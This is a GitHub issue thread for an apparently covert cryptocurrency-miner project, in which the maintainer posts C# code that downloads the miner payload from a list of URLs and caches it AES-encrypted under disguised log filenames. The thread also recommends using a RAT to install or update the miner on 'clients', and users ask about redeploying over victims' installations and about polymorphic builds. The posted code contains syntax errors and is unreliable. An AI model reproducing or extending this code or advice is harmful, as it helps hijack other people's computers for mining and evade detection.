### ISSUE TITLE
why did you remove the online download function 

### ISSUE THREAD

**Issue by Toxenskiy** [UnamSanctam/SilentXMRMiner#464]
why did you remove the download function because you blocked your domain?

**Comment by Toxenskiy** [comment]
something like pastebin

**Comment by UnamSanctam** [comment]
If you want the function you can re-add it, didn't need to add anything into the builder since only advanced users would use their own miner repository for "Online Download" anyways, and if they are advanced users then they can add the function as well.

**Comment by Toxenskiy** [comment]
I know that I can do this, but the more updates you have, the more difficult it is for me to redo them over and over again.

**Comment by UnamSanctam** [comment]
Yes but it would be a complicated feature for users to understand which is why I won't do that. Of course I would have wanted the "Online Download" feature to stay but since the domain got banned I had to make a decision and the best one was to remove the feature since if I cannot host it myself then it would be a security liability for the users, since if I hosted it on some external host then they could take over it and replace the miner download with a malicious program.

If you really need it then you can use this function that I made before deciding to remove the "Online Download":
```
public static byte[] _rFileCache_(string _rresourceid_, string _rid_, string[] _rurls_)
    {
        byte[] _rxm_ = { };
        try
        {
#if DefInstall
            if (!File.Exists(Path.Combine(_rbD_, _rGetString_("#WATCHDOG") + ".log")))
            {
#endif
                foreach (string i in _rurls_)
                {
                    using (var client = new System.Net.WebClient())
                    {
                        try
                        {
                            _rxm_ = client.DownloadData(client.DownloadString(_rGetString_(i)));
                            if (_rxm_.Length != 0)
                            {
                                break;
                            }
                        }
                    catch (Exception ex)
                    {
#if DefDebug
                        MessageBox.Show("M6.5: Couldn't get file from " + i, moving on to backup" + Environment.NewLine + ex.ToString());
#endif
                    }
                }
#if DefInstall
                if (_rxm_.Length > 0) {
                    File.WriteAllBytes(Path.Combine(_rbD_, _rGetString_("#WATCHDOG") + _rid_ + ".log"), _rAESMethod_(_rxm_, true));
                }
#endif
                }
#if DefInstall
            }
            else
            {
                _rxm_ = _rAESMethod_(File.ReadAllBytes(Path.Combine(_rbD_, _rGetString_("#WATCHDOG") + ".log")));
            }
#endif
        }
        catch(Exception ex){
#if DefDebug
            MessageBox.Show("MCDL: " + Environment.NewLine + ex.ToString());
#endif
        }
#else
        _rxm_ = _rGetTheResource_(_rresourceid_);
        return _rxm_;
    }
```
Explanations of the arguments:
_rresourceid_: The resource id for the file, either "#xmr" or "#libs" depending on which file.
_rid_: The cache id for the file, use one for the xmrig download and one for the libs download.
_rurls_: String array of URLs to try and download the file from.

**Comment by Toxenskiy** [comment]
ok, well, if I'm not mistaken, the same code was in 1.5.0 1in1

**Comment by Toxenskiy** [comment]
looks very strange.

**Comment by UnamSanctam** [comment]
Yes you can really only update through reinstallations, since the 'Remote Configuration' is inside the miner itself and doesn't interact with anything outside the miner settings. If you want to be able to have more control over clients then you should use things like a RAT to install/update the miner or anything else.

**Comment by marbletissue** [comment]
> 
> 
> Yes you can really only update through reinstallations, since the 'Remote Configuration' is inside the miner itself and doesn't interact with anything outside the miner settings. If you want to be able to have more control over clients then you should use things like a RAT to install/update the miner or anything else.

Thanks. Is there any issues with deploying newer versions over the top of existing installations?
Settings and deployment method will be the same.

**Comment by UnamSanctam** [comment]
No if it has the same "Startup" settings then it will overwrite the old one.

**Comment by Toxenskiy** [comment]
How about a polymorph build?

**Comment by Toxenskiy** [comment]
?

**Comment by UnamSanctam** [comment]
Well that's possible though not on my list right now.

**Comment by Toxenskiy** [comment]
Well, now another month has passed since the development of the software. How soon do you think you will finish?
